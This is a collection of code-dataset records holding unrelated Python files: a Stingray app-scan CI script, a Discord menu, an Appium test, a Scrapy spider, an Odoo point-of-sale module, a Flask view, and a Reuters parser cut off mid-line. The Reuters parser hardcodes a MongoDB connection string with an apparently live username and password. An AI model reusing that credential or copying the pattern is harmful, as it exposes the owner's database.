log.error('Get scan result error: {0}'.format(result_object.get('message', 'N/A')))\n return None\n return result_object\n\n def get_short_stat(self, scan_id):\n \"\"\"\n Get short issue statistic from specified scan Id\n :param scan_id: Scan ID to get results\n :return:\n \"\"\"\n result_response = self.get('{0}/rest/scanresult/{1}/issuessummary'.format(self.url, scan_id))\n result_object = self._response_json(result_response)\n if result_response.status_code != 200:\n log.error('Get scan summary error: {0}'.format(result_object.get('message', 'N/A')))\n return {}\n return result_object\n\n def create_report(self, scan_result, type):\n \"\"\"\n Create json report with data specified\n :param scan_result: data to write as Json report\n :return: None\n \"\"\"\n if type == 'standard' or type == 'grouping':\n report_name = 'stingray_scan_{0}_report.json'.format(type)\n else:\n report_name = 'stingray_scan_report-testcase_{}.json'.format(self.testcase)\n with open(report_name, 'w') as f:\n f.write(json.dumps(scan_result, indent=4))\n\n\nclass Log:\n def info(self, message):\n self._log('INFO', message)\n\n def error(self, message):\n self._log('ERROR', message)\n\n def debug(self, message):\n self._log('DEBUG', message)\n\n def _log(self, level, message):\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n message = '{time} - {level} {message}'.format(time=current_date, level=level, message=message)\n print(message)\n\nclass ValidateReport(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n valid_types = ('standard', 'separate', 'grouping')\n reportType = values\n for i in reportType:\n if i not in valid_types:\n raise ValueError('invalid type {0}, supported types are {1}'.format(i, valid_types))\n setattr(args, self.dest, reportType)\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Start scan and get scan results from Stingray')\n parser.add_argument('--distribution_system', type=str, help='Select how to get apk file', choices=['file', 'hockeyapp', 'appcenter'], required=True)\n\n # Arguments used for distribution_system = file\n parser.add_argument('--file_path', type=str, help='Path to local apk file for analyze. This argument required if distribution system set to \"file\"')\n\n # Arguments used for distribution_system = hockeyapp\n parser.add_argument('--hockey_token', type=str, help='Auth token for HockeyApp. This argument required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_bundle_id', type=str, help='Application bundle in HockeyApp. This argument or \"--hockey_public_id\" required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_public_id', type=str, help='Application identifier in HockeyApp. This argument or \"--hockey_bundle_id\" required if distribution system set to \"hockeyapp\"')\n parser.add_argument('--hockey_version', type=str, help='Application version in HockeyApp. If not set - the latest version will be downloaded. This argument required if distribution system set to \"hockeyapp\"', default='latest')\n\n # Arguments used for distribution_system = appcenter\n parser.add_argument('--appcenter_token', type=str, help='Auth token for AppCenter. This argument required if distribution system set to \"appcenter\"')\n parser.add_argument('--appcenter_owner_name', type=str, help='Application owner name in AppCenter. This argument required if distribution system set to \"appcenter\"')\n parser.add_argument('--appcenter_app_name', type=str, help='Application name in AppCenter. This argument required if distribution system set to \"appcenter\"')\n parser.add_argument('--appcenter_release_id', type=str, help='Release id in AppCenter. If not set - the latest release will be downloaded. This argument or \"--ac_app_version\" required if distribution system set to \"appcenter\"')\n parser.add_argument('--appcenter_app_version', type=str,help='Application version in AppCenter. This argument or \"--appcenter_release_id\" required if distribution system set to \"appcenter\"')\n\n # Arguments for Stingray\n parser.add_argument('--stingray_url', type=str, help='Stingray url', required=True)\n parser.add_argument('--token', type=str, help='CI/CD Token for start scan and get results', required=True)\n parser.add_argument('--profile', type=int, help='Project id for scan', required=True)\n parser.add_argument('--testcase', nargs='+', type=int, help='Testcase Id')\n parser.add_argument('--report', nargs='*', type=str, help='Select which type of report should be created', action=ValidateReport, default=['standard'])\n\n args = parser.parse_args()\n\n if args.distribution_system == 'file' and args.file_path is None:\n parser.error('\"--distribution_system file\" requires \"--file_path\" argument to be set')\n elif args.distribution_system == 'hockeyapp' and (\n args.hockey_token is None or\n (args.hockey_bundle_id is None or args.hockey_public_id is None)):\n parser.error('\"--distribution_system hockeyapp\" requires \"--hockey_token\" and \"--hockey_app\" arguments to be set')\n elif args.distribution_system == 'appcenter' and (\n args.appcenter_token is None or args.appcenter_owner_name is None or args.appcenter_app_name is None or (\n args.appcenter_release_id is None and args.appcenter_app_version is None)):\n parser.error(\n '\"--distribution_system appcenter\" requires \"--appcenter_token\", \"--appcenter_owner_name\", \"--appcenter_app_name\" and '\n '\"--appcenter_release_id\" or \"--appcenter_app_version\" arguments to be set')\n return args\n\ndef join_results(scans, type):\n '''\n Get scan results from several tescases and join them in one common result\n '''\n\n report = []\n added = False\n\n # Grouping of scan results, issues of a same type are joined together, these issues details go to a list\n if type == 'grouping':\n\n for scan in scans:\n for issue in scan:\n\n if not report:\n report.append(scan[0])\n continue\n\n for addedIssue in report:\n\n added = False\n if issue['name'] == addedIssue['name']:\n\n if issue['details'] != addedIssue['details'] and issue['details'] not in addedIssue['details']:\n if not isinstance(addedIssue['details'][0], list):\n temp=[]\n temp.append(addedIssue['details'])\n temp.append(issue['details'])\n addedIssue['details'] = temp\n else:\n addedIssue['details'].append(issue['details'])\n\n added = True\n addedIssue['id'].extend(issue['id'])\n if issue['scan_id'][0] not in addedIssue['scan_id']:\n addedIssue['scan_id'].extend(issue['scan_id'])\n break\n\n if not added:\n report.append(issue)\n #Standard report, same issues from different testcases are joined to escape duplicates\n else:\n for scan in scans:\n\n if not report:\n report.extend(scan)\n continue\n currReportLen = len(report)\n\n for issue in scan:\n\n ind = 0\n added= False\n\n for addedIssue in report:\n\n ind += 1\n if issue['name'] == addedIssue['name'] and issue['details'] == addedIssue['details']:\n addedIssue['id'].extend(issue['id'])\n if issue['scan_id'][0] not in addedIssue['scan_id']:\n addedIssue['scan_id'].extend(issue['scan_id'])\n added = True\n break\n\n if ind == currReportLen and not added:\n report.append(issue)\n break\n return(report)\n\nif __name__ == '__main__':\n\n log = Log()\n urllib3.disable_warnings()\n\n arguments = parse_args()\n results = []\n\n stingray_url = arguments.stingray_url\n stingray_token = arguments.token\n stingray_profile = arguments.profile\n stingray_testcase_set = set(arguments.testcase)\n distribution_system = arguments.distribution_system\n\n report_types = arguments.report\n if not report_types:\n report_types = ['standard']\n\n apk_file = ''\n if distribution_system == 'file':\n apk_file = arguments.file_path\n elif distribution_system == 'hockeyapp':\n hockey_app = HockeyApp(arguments.hockey_token,\n arguments.hockey_bundle_id,\n arguments.hockey_public_id,\n arguments.hockey_version)\n apk_file = hockey_app.download_app()\n elif distribution_system == 'appcenter':\n appcenter = AppCenter(arguments.appcenter_token,\n arguments.appcenter_app_name,\n arguments.appcenter_owner_name,\n arguments.appcenter_app_version,\n arguments.appcenter_release_id)\n apk_file = appcenter.download_app()\n\n for stingray_testcase_id in stingray_testcase_set:\n\n if len(stingray_testcase_set) > 1:\n log.info('Processing testcase {0}'.format(stingray_testcase_id))\n else:\n if 'standard' in report_types:\n report_types.remove('standard')\n if not report_types:\n report_types = ['separate']\n\n stingray = Stingray(stingray_url, stingray_token, apk_file, stingray_profile, stingray_testcase_id)\n\n log.info('Start automated scan with test case Id: {0}, profile Id: {1} and file: {2}'.format(\n stingray_testcase_id, stingray_profile, apk_file))\n\n scan_id = stingray.start_scan()\n\n if not scan_id:\n log.error('Error when starting scan. Exit with error code 1')\n sys.exit(1)\n\n scan_complete = False\n log.info('Scan successfully started. Monitor scan status')\n while not scan_complete:\n log.info('Get scan status')\n scan_complete = stingray.get_scan_status(scan_id)\n time.sleep(30)\n\n log.info('Scan complete, trying to get scan result')\n scan_result = stingray.get_scan_result(scan_id)\n if not scan_result:\n continue\n\n log.info('Scan complete, analysing issues')\n short_stat = stingray.get_short_stat(scan_id)\n if not short_stat:\n sys.exit(5)\n log.info('Vulnerability details: {0}'.format(short_stat))\n\n for i in scan_result:\n i['id'] = str(stingray_testcase_id) + '-' + str(i['id'])#add testcase to id\n i['scan_id'] = scan_id\n\n if 'separate' in report_types:\n stingray.create_report(scan_result, type)\n log.info('Creating separate report...')\n\n for i in scan_result:\n i['id'] = [i['id']]\n i['scan_id'] = [i['scan_id']]\n\n results.append(scan_result)\n\n for type in report_types:\n if type == 'standard' or type == 'grouping':\n common_result = join_results(results, type)\n log.info('Creating {0} report...'.format(type))\n stingray.create_report(common_result, type)\n\n if len(results) == 0:\n log.info('There is no issue data for the report')\n \n log.info('Job completed successfully')\n","sub_path":"run-stingray-scan.py","file_name":"run-stingray-scan.py","file_ext":"py","file_size_in_byte":23845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"211832218","text":"import asyncio\nimport re\n\nimport discord\n\nimport modules.utility as utility\n\nfrom classes.DictSavable import DictSavable\nfrom classes.InputMenu import InputMenu\nfrom modules import basics, aesthetic\n\narrow_r = \"<:_:541089103551266827>\"\n\nclass Help(InputMenu):\n def __init__(self,bot,**kwargs):\n InputMenu.__init__(self,bot,**kwargs)\n # Setup\n defaults = {\n \"show\": \"\"\n }\n DictSavable.__init__(self, defaults, kwargs, exclude=[\"validfor\"])\n\n async def getlayout(self,index,*,final=False):\n return await basics.help(self.context, self.show, False)\n\n async def start(self):\n await InputMenu.start(self)\n for x in range(1,17):\n await self.messages[0].add_reaction(self.bot.buttons[str(x)])\n self.adddict[self.bot.buttons[str(x)].id] = self.numberbutton\n\n async def input(self, m, s):\n self.show = s\n await self.updatemessage(0)\n\n async def reactionadded(self,payload):\n if payload.message_id == self.foreignmessages[0].id:\n await self.addreaction(payload.emoji, payload.user_id)\n await self.updatemessage(0)\n\n async def numberbutton(self,payload):\n print(\"heh\")","sub_path":"rewrite/classes/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"563729634","text":"import os\nimport unittest\nfrom appium import webdriver\nfrom time import sleep\n\n#自带计算器测试\n# Returns abs path relative to this file and not cwd\nlambda p: os.path.abspath(\n os.path.join(os.path.dirname(__file__), p)\n)\n\nclass AndroidTests(unittest.TestCase):\n\n def setUp(self):\n desired_caps = {}\n desired_caps['platformName'] = 'Android'\n desired_caps['platformVersion'] = '8.0'\n desired_caps['deviceName'] = 'c3d59ab1'\n desired_caps['appPackage'] = 'com.sec.android.app.popupcalculator'\n desired_caps['appActivity'] = '.Calculator'\n\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n def tearDown(self):\n self.driver.quit()\n\n def test_calcuator(self):\n el = self.driver.find_element_by_id(\"bt_08\").click()\n el = self.driver.find_element_by_id(\"bt_add\").click()\n el = self.driver.find_element_by_id(\"bt_07\").click()\n el = self.driver.find_element_by_id(\"bt_backspace\").click()\n sleep(2)\n el = self.driver.find_element_by_id(\"bt_05\").click()\n el = self.driver.find_element_by_id(\"bt_equal\").click()\n screenshotBase64 = self.driver.get_screenshot_as_base64()\n sleep(2)\n el = self.driver.find_element_by_id(\"bt_clear\").click()\n sleep(2)\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(AndroidTests)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"lianxi/Calculatortest.py","file_name":"Calculatortest.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"280563155","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nimport json\nimport ast\nfrom ...items.fang.xzlshou import FangXzlShouItem\n\nclass FangXzlShouSpider(scrapy.Spider):\n name = 'FangXzlShouSpider'\n allowed_domains = ['fang.com']\n start_urls = ['https://ditu.fang.com/?c=channel&a=ajaxXiaoquMapSearch&x1=116.47361755371094&y1=39.964210510253906&distance=2&strNewCode=1010082663&esf=1']\n db_name = 'fang'\n collection_name = 'xzlshou'\n\n def parse(self, response):\n res_json = json.loads(response.body)\n\n zhuzhai = res_json[\"住宅\"]\n xiezilou = res_json[\"写字楼\"]\n\n\n building_types = [zhuzhai, xiezilou]\n url_queue = []\n\n for building_type in building_types:\n for building in building_type:\n projcode = building[\"projcode\"]\n coordx = building[\"coordx\"]\n coordy = building[\"coordy\"]\n city = building[\"city\"].encode(\"unicode-escape\").decode(\"utf-8\").replace(\"\\\\\", \"%\")\n district = building[\"district\"].encode(\"unicode-escape\").decode(\"utf-8\").replace(\"\\\\\", \"%\")\n\n url_queue.append((projcode, coordx, coordy))\n\n item = FangXzlShouItem()\n item[\"info\"] = building\n\n yield item\n\n new_url = 'https://ditu.fang.com/?c=channel&a=ajaxXiaoquMapSearch&x1={} \\\n &y1={}&distance=2&strNewCode={}&esf=1'.format(url_queue[0][1], url_queue[0][2], url_queue[0][0])\n del url_queue[0]\n\n yield scrapy.Request(url=new_url,\n callback=self.parse \n )\n","sub_path":"deecamp_scraper/spiders/fang/FangXzlShou.py","file_name":"FangXzlShou.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651655238","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom addons.point_of_sale.models.pos_session import PosSession\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\nimport datetime\nimport time\n\n\nclass KGPOSSession(models.Model):\n _inherit = 'pos.session'\n\n # Working_date odoo == working_date PMS\n # start_at disimpan di database dalam bentuk DateTime UTC (GMT+00) di field postgres DateTime Without Timezone\n # jika session kasir Room Service open/start at tgl 10 feb jam 1 malam WIB,\n # maka akan tersimpan di database 2019-02-09T18:00:00 == GMT+00\n # ini akan problem saat extract data ke analytics/BI,\n # krn itu field ini dibutuhkan, akan terisi = Date Start at = 2019-02-10\n # PENTING: pastikan setting timezone di master user sudah di set ke Asia/Jakarta\n # atau Asia/Makasar atau Asia/Jayapura\n working_date = fields.Date(\n string='Working Date',\n required=True, states={'closed': [('readonly', True)]},\n index=True, copy=False, default=fields.Date.context_today,\n help=\"Active Working Date\")\n\n # name_shift = fields.Char('Session')\n shift_id = fields.Many2one('hr.shift', string='Shift')\n name = fields.Char(string='Session ID', required=True, default='/')\n\n # @api.onchange('shift_id')\n # def _onchange_shift(self):\n # orig_name = self._origin.name.replace('/' + self._origin.shift_id.code, \"\")\n #\n # self.name = orig_name + '/' + self.shift_id.code\n #\n # return self\n\n # code when we want to show pop up to select journal for applying advance payment\n # @api.multi\n # def action_pos_session_closing_control(self):\n # self._check_pos_session_balance()\n # for session in self:\n # session.write({'state': 'closing_control', 'stop_at': fields.Datetime.now()})\n # if not session.config_id.cash_control:\n # if any(order.pos_advance_payment_ids for order in session.order_ids):\n # view_id = self.env.ref('kg_pos.wizard_adv_payment_journal_view')\n # return {\n # 'domain': \"[]\",\n # 'name': _('Select journal for applying advance payment'),\n # 'view_type': 'form',\n # 'view_mode': 'form',\n # 'res_model': 'wizard.select.journal',\n # 'view_id': view_id.id,\n # 'target': 'new',\n # 'type': 'ir.actions.act_window'\n # }\n # else:\n # session.action_pos_session_close()\n # end of code\n\n # code when we want to show pop up to select journal for applying advance payment\n # @api.multi\n # def action_pos_session_validate(self):\n # self._check_pos_session_balance()\n\n # # custom code\n # for session in self:\n # if any(order.pos_advance_payment_ids for order in session.order_ids):\n # view_id = self.env.ref('kg_pos.wizard_adv_payment_journal_view')\n\n # return {\n # 'domain': \"[]\",\n # 'name': _('Select journal for applying advance payment'),\n # 'view_type': 'form',\n # 'view_mode': 'form',\n # 'res_model': 'wizard.select.journal',\n # 'view_id': view_id.id,\n # 'target': 'new',\n # 'type': 'ir.actions.act_window'\n # }\n # else:\n # session.action_pos_session_close()\n # end of custom code\n\n # original code\n # self._check_pos_session_balance()\n # self.action_pos_session_close()\n # end of original code\n\n # end of code\n\n @api.model\n def create(self, values):\n res = super(KGPOSSession, self).create(values)\n for statement in res.statement_ids:\n statement.date = res.working_date\n return res\n\n @api.multi\n def write(self, values):\n res = super(KGPOSSession, self).write(values)\n if values.get('working_date'):\n for rec in self:\n for statement in rec.statement_ids:\n if statement.date != values.get('working_date'):\n statement.date = values.get('working_date')\n return res\n\n def _confirm_orders(self):\n for session in self:\n company = session.config_id.journal_id.company_id\n company_id = company.id\n orders = session.order_ids.filtered(lambda order: order.state == 'paid').sorted(key=lambda order: order.id)\n\n # custom code by andi\n for order in orders:\n\n if order.pos_advance_payment_ids:\n if order.apply_id:\n # refund process\n order.post_refund_order_advance_payment()\n else:\n self.post_order_with_advance_payment(order)\n\n elif order.customer_id:\n if order.apply_id:\n # refund process\n order.post_refund_order_city_ledger()\n else:\n self.post_order_cust_city_ledger(order, session)\n\n # end of custom code\n\n super(KGPOSSession, self)._confirm_orders()\n\n # journal_id = self.env['ir.config_parameter'].sudo().get_param(\n # 'pos.closing.journal_id_%s' % company_id, default=session.config_id.journal_id.id)\n # if not journal_id:\n # raise UserError(_(\"You have to set a Sale Journal for the POS:%s\") % (session.config_id.name,))\n #\n # move = self.env['pos.order'].with_context(force_company=company_id)._create_account_move(\n # session.start_at, session.name, int(journal_id), company_id)\n # orders.with_context(force_company=company_id)._create_account_move_line(session, move)\n # for order in session.order_ids.filtered(lambda o: o.state not in ['done', 'invoiced']):\n # if order.state not in ('paid'):\n # raise UserError(\n # _(\"You cannot confirm all orders of this session, because they have not the 'paid' status.\\n\"\n # \"{reference} is in state {state}, total amount: {total}, paid: {paid}\").format(\n # reference=order.pos_reference or order.name,\n # state=order.state,\n # total=order.amount_total,\n # paid=order.amount_paid,\n # ))\n # order.action_pos_order_done()\n # orders_to_reconcile = session.order_ids._filtered_for_reconciliation()\n # orders_to_reconcile.sudo()._reconcile_payments()\n\n def post_order_cust_city_ledger(self, order, session):\n # TODO: refactor code, extract method to create invoice, use statement_line.create_invoice_from_pos_payment\n # new code: (belum sempat test, buka code ini, tutup yg old code, kemudian lakukan test)\n # statement_payment = None\n # statement_payment_amount_used = 0\n # partner = order.customer_id\n # if not partner:\n # return False\n #\n # for st_line in order.statement_ids:\n # if st_line.journal_id.is_city_ledger:\n # statement_payment = st_line\n # statement_payment_amount_used += st_line.amount\n # invoice_journal = st_line.journal_id\n # account_id_invoice_line = invoice_journal.default_credit_account_id.id\n # if statement_payment and statement_payment_amount_used > 0:\n # statement_payment.create_invoice_from_pos_payment(\n # order, partner, invoice_journal, account_id_invoice_line,\n # statement_payment_amount_used)\n\n # old custom code:\n invoice = self.env['account.invoice']\n if order.customer_id.property_account_receivable_id.id:\n account_id = order.customer_id.property_account_receivable_id.id\n else:\n raise UserError(\n _('There is no receivable account defined for city ledger customer \"%s\"') %\n (order.customer_id.name,))\n if any(st_line.journal_id.is_city_ledger for st_line in order.statement_ids):\n city_ledger_journal = order.statement_ids.filtered(lambda st: st.journal_id.is_city_ledger)[\n 0].journal_id\n related_journal = city_ledger_journal\n journal_id = city_ledger_journal.id\n else:\n related_journal = order.sale_journal\n journal_id = order.sale_journal.id\n # TODO: for RETURN transaction, create credit note and auto reconcile with the original invoice\n values = {\n 'date_invoice': session.working_date,\n 'partner_id': order.customer_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'account_id': account_id,\n 'user_id': order.user_id.id,\n 'journal_id': journal_id,\n 'company_id': order.company_id.id,\n 'origin': order.name,\n 'invoice_line_ids': [],\n 'app_source': 'pos'\n }\n city_ledger_statement = order.statement_ids.filtered(lambda st: st.journal_id.is_city_ledger)\n city_ledger_amount_used = sum(cl_statement.amount for cl_statement in city_ledger_statement)\n vals = {\n 'name': order.name,\n # 'product_id': line.product_id.id,\n 'account_id': related_journal.default_credit_account_id.id,\n # 'account_id': order.customer_id.expense_account_id.id,\n 'quantity': 1,\n 'price_unit': city_ledger_amount_used or 0,\n # 'invoice_line_tax_ids': [(6, 0, line.tax_ids.mapped('id'))] or False,\n }\n values['invoice_line_ids'].append((0, 0, vals))\n curr_invoice = invoice.create(values)\n order.invoice_id = curr_invoice\n # validate invoice\n curr_invoice.action_invoice_open()\n\n def post_order_with_advance_payment(self, order):\n invoice = self.env['account.invoice']\n if order.partner_id.property_account_receivable_id.id:\n account_id = order.partner_id.property_account_receivable_id.id\n else:\n raise UserError(\n _('There is no receivable account defined for customer \"%s\"') %\n (order.partner_id.name,))\n if any(journal.is_advance_payment for journal in order.statement_ids.mapped('journal_id')):\n\n journal = order.statement_ids.filtered(lambda st: (\n st.journal_id.is_advance_payment == True\n )).mapped('journal_id')[-1]\n\n journal_id = journal.id\n\n else:\n journal_id = order.sale_journal.id\n values = {\n 'partner_id': order.partner_id.id,\n 'currency_id': order.pricelist_id.currency_id.id,\n 'account_id': account_id,\n 'user_id': order.user_id.id,\n 'journal_id': journal_id,\n 'company_id': order.company_id.id,\n 'origin': order.name,\n 'invoice_line_ids': [],\n 'app_source': 'pos'\n }\n for payment in order.pos_advance_payment_ids:\n vals = {\n 'name': payment.name,\n 'account_id': payment.advance_payment_account_id.id,\n 'quantity': 1,\n 'price_unit': payment.adv_payment_amount_used,\n }\n values['invoice_line_ids'].append((0, 0, vals))\n curr_invoice = invoice.create(values)\n order.invoice_id = curr_invoice\n # validate invoice\n curr_invoice.action_invoice_open()\n account_adv_payment_inv = self.env['account.advance.payment.invoice']\n real_adv_payment_id = order.pos_advance_payment_ids.mapped('adv_payment_id')\n real_adv_payment = self.env['account.payment'].browse(real_adv_payment_id)\n # code to apply journal from pop up wizard when validatin POS session\n # if self.env.context.get('adv_payment_journal', False):\n # journal = self.env.context.get('adv_payment_journal', False)\n # else:\n # journal = curr_invoice.journal_id\n # end of code\n journal = curr_invoice.journal_id\n order.invoice_id = curr_invoice\n value = {\n 'journal_id': journal.id,\n 'date': fields.date.today(),\n 'advance_payment_ids': [(6, 0, real_adv_payment.ids)]\n }\n account_adv_payment_inv = account_adv_payment_inv.with_context(\n active_model=curr_invoice._name,\n active_ids=curr_invoice.mapped('id'),\n active_id=curr_invoice.id).create(\n value)\n account_adv_payment_inv.apply_advance_payment()\n # code for sending data to PMS\n post_request = self.env['pos.helpers']\n post_request.post_adv_payment(advance_payments=account_adv_payment_inv.advance_payment_ids)\n # end of code\n\n @api.multi\n def action_pos_session_close(self):\n # Close CashBox\n for session in self:\n # custom code, get date from working date field\n # start_date = datetime.datetime.strptime(session.start_at, \"%Y-%m-%d %H:%M:%S\").date()\n start_date = fields.Date.from_string(session.working_date)\n # end of custom code\n\n company_id = session.config_id.company_id.id\n ctx = dict(self.env.context, force_company=company_id, company_id=company_id)\n for st in session.statement_ids:\n # custom code\n st.date = session.working_date\n order_with_same_journal_id = session.order_ids.filtered(\n lambda order:\n (\n st.journal_id.id in order.statement_ids.mapped('journal_id').mapped('id')\n )\n )\n # end of custom code\n\n if abs(st.difference) > st.journal_id.amount_authorized_diff:\n # The pos manager can close statements with maximums.\n if not self.user_has_groups(\"point_of_sale.group_pos_manager\"):\n raise UserError(_(\n \"Your ending balance is too different from the theoretical cash closing (%.2f), \"\n \"the maximum allowed is: %.2f. You can contact your manager to force it.\") % (\n st.difference, st.journal_id.amount_authorized_diff))\n if st.journal_id.type not in ['bank', 'cash']:\n raise UserError(_(\"The type of the journal for your payment method should be bank or cash \"))\n\n # custom code mario ardi\n if st.journal_id.is_officer_check or st.journal_id.is_department_expense:\n st.with_context(ctx, order_with_same_journal_id=order_with_same_journal_id,\n start_date=start_date).sudo().button_confirm_bank_kg_dept_officer()\n self.create_additional_journal(st, order_with_same_journal_id)\n else:\n st.with_context(ctx, order_with_same_journal_id=order_with_same_journal_id,\n start_date=start_date).sudo().button_confirm_bank()\n # end of custom code mario ardi\n\n self.with_context(ctx, start_date=start_date)._confirm_orders()\n self.write({'state': 'closed'})\n return {\n 'type': 'ir.actions.client',\n 'name': 'Point of Sale Menu',\n 'tag': 'reload',\n 'params': {'menu_id': self.env.ref('point_of_sale.menu_point_root').id},\n }\n\n @api.multi\n def create_additional_journal(self, st, order_ids):\n data = []\n for order in order_ids:\n\n # move_id = order.account_move.id\n\n for line in order.lines:\n income_account = False\n if line.product_id.property_account_income_id.id:\n income_account = line.product_id.property_account_income_id.id\n elif line.product_id.categ_id.property_account_income_categ_id.id:\n income_account = line.product_id.categ_id.property_account_income_categ_id.id\n\n if not income_account:\n raise UserError(\n _('There is no Income Account defined for this product: \"%s\" -- product category: \"%s\"') %\n (line.product_id.name, line.product_id.categ_id.name))\n expense_account = False\n if line.product_id.property_account_expense_id.id:\n expense_account = line.product_id.property_account_expense_id.id\n elif line.product_id.categ_id.property_account_expense_categ_id.id:\n expense_account = line.product_id.categ_id.property_account_expense_categ_id.id\n\n if not expense_account:\n raise UserError(\n _('There is no Expense Account defined for this product: \"%s\" -- product category: \"%s\"') %\n (line.product_id.name, line.product_id.categ_id.name))\n\n # misc_journal_id = self.env['account.journal'].search([\n # ('company_id.id','=',order.company_id.id),\n # ('type','=','general'),\n # ],limit=1)\n\n # if not misc_journal_id:\n # raise UserError(\n # _('There is no Miscellaneous journal defined for this company \"%s\"') %\n # (order.company_id.name,))\n\n cost_price = line.qty * line.product_id.standard_price\n\n # debit_line = order.account_move.line_ids.with_context(\n # check_move_validity=False).create({\n # # 'move_id': move_id,\n # 'name': order.name + ' : ' + line.product_id.name,\n # 'journal_id': st.journal_id.id,\n # # 'journal_id' : misc_journal_id.id,\n # 'date': self.working_date,\n # 'account_id': income_account,\n # 'debit': cost_price,\n # 'credit': 0,\n # # 'statement_id': st.id,\n # # 'statement_line_id': order.statement_ids[0].id,\n # # 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n # })\n\n debit_line_vals = (0, 0, {\n 'name': order.name + ' : ' + line.product_id.name,\n 'journal_id': st.journal_id.id,\n # 'journal_id' : misc_journal_id.id,\n 'date': self.working_date,\n 'account_id': income_account,\n 'debit': cost_price,\n 'credit': 0,\n 'statement_id': st.id,\n 'statement_line_id': order.statement_ids[0].id,\n 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n })\n data.append(debit_line_vals)\n\n credit_line_vals = (0, 0, {\n 'name': order.name + ' : ' + line.product_id.name,\n 'journal_id': st.journal_id.id,\n # 'journal_id' : misc_journal_id.id,\n 'date': self.working_date,\n 'account_id': expense_account,\n 'debit': 0,\n 'credit': cost_price,\n 'statement_id': st.id,\n 'statement_line_id': order.statement_ids[0].id,\n 'payment_id': order.statement_ids[0].journal_entry_ids[0].payment_id.id,\n })\n data.append(credit_line_vals)\n\n move_id = self.env['account.move'].create({\n 'ref': self.name + ' - Additional - Internal Transaction',\n 'journal_id': st.journal_id.id,\n 'date': self.working_date,\n 'narration': 'Journal Tambahan - transaksi internal - POS - officer check/dept expense',\n 'line_ids': data\n })\n move_id.post()\n\n\n","sub_path":"local/kg_pos/models/pos_session.py","file_name":"pos_session.py","file_ext":"py","file_size_in_byte":20651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"59091734","text":"import flask, flask.views\nimport os\nimport utils\nfrom app import app, db\nfrom flask import Flask, jsonify, render_template, request\nfrom models import Task, User\n\nclass History(flask.views.MethodView):\n\t@utils.login_required\n\tdef get(self):\n\t\treturn flask.render_template('history.html')\n\n\t@utils.login_required\n\tdef post(self):\n\t\treturn flask.redirect(flask.url_for('history'))\n\n\t@app.route('/echo/', methods=['GET'])\n\tdef echo():\n\t\tusername = flask.session.get('username')\n\t\tuser = User.query.filter_by(username = username).first()\n\t\tuser_id = user.id\n\n\t\thistory = Task.query.filter_by(user_id = user_id).all()\n\t\thistory_dict = [dict(id=row.id,\n\t\t\tscene=row.scene,\n\t\t\tstate=row.state,\n\t\t\tprogress=row.progress,\n\t\t\tadd_date=row.add_date,\n\t\t\tstart_date=row.start_date,\n\t\t\tfinish_date=row.finish_date,\n\t\t\trendered_scene=row.rendered_scene) for row in history]\n\t\t#ret_data = {\"value\": ppp.id, \"id\": ppp.scene}\n\t\treturn jsonify(data_val = history_dict)","sub_path":"aplikacja_flask/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"268727070","text":"import re\nimport pymongo\n\n#Database connectivity and file details\nmyclient = pymongo.MongoClient('mongodb+srv://jeyanth:7HPAE8apzyvPmxdV@cluster0.smhz3.mongodb.net/test?authSource=admin&replicaSet=atlas-7myp9l-shard-0&readPreference=primary&appname=MongoDB%20Compass&ssl=true')\ndatabase = myclient['ReuterDb']\ncollection = database['processeddata']\nfilename = ['reut2-009.sgm','reut2-014.sgm']\nspcl_char_regex=re.compile('[@_!#$%^&*\\\\n();,.\\'<>?/\\|}{~:]')\n\n#Accesing the files\nfor file in filename:\n with open(file,'r') as fh:\n newcollection = []\n filedata = fh.read()\n reg_str = \"]*>\\s*((?:.|\\n)*?)\"\n res = re.findall(reg_str, filedata)\n print('Processing of Data, start for the file '+file)\n #Individual news are obtained and processed below\n for line in res:\n reuter = {}\n title = ''\n try:\n place = re.findall(']*>([^<]+)', line)[0]\n except:\n place = ''\n try:\n date = re.findall(']*>([^<]+)', line)[0]\n except:\n date = ''\n try:\n people = re.findall(']*>([^<]+)', line)[0]\n except:\n people = ''\n try:\n companies = re.findall(']*>([^<]+)', line)[0]\n except:\n companies = ''\n try:\n orgs = re.findall(']*>([^<]+)', line)[0]\n except:\n orgs = ''\n try:\n topics = re.findall(']*>([^<]+)', line)[0]\n except:\n topics = ''\n #Texttag contains the title and data\n texttags = re.findall(\"]*>([\\s\\S]+[^<]*?)\", line)\n for texttag in texttags:\n titleText = re.findall(\"]*>([^<]+)\", texttag)\n for titleOne in titleText:\n title = titleOne\n result = re.sub(']*>([^<]+)', '', texttag)\n body = re.sub('<.*?>', '', result)\n body = re.sub(spcl_char_regex,'',body)\n reuter[\"title\"] = title\n reuter[\"place\"] = place\n reuter[\"date\"] = date\n reuter[\"topics\"] = topics\n reuter[\"place\"] = place\n 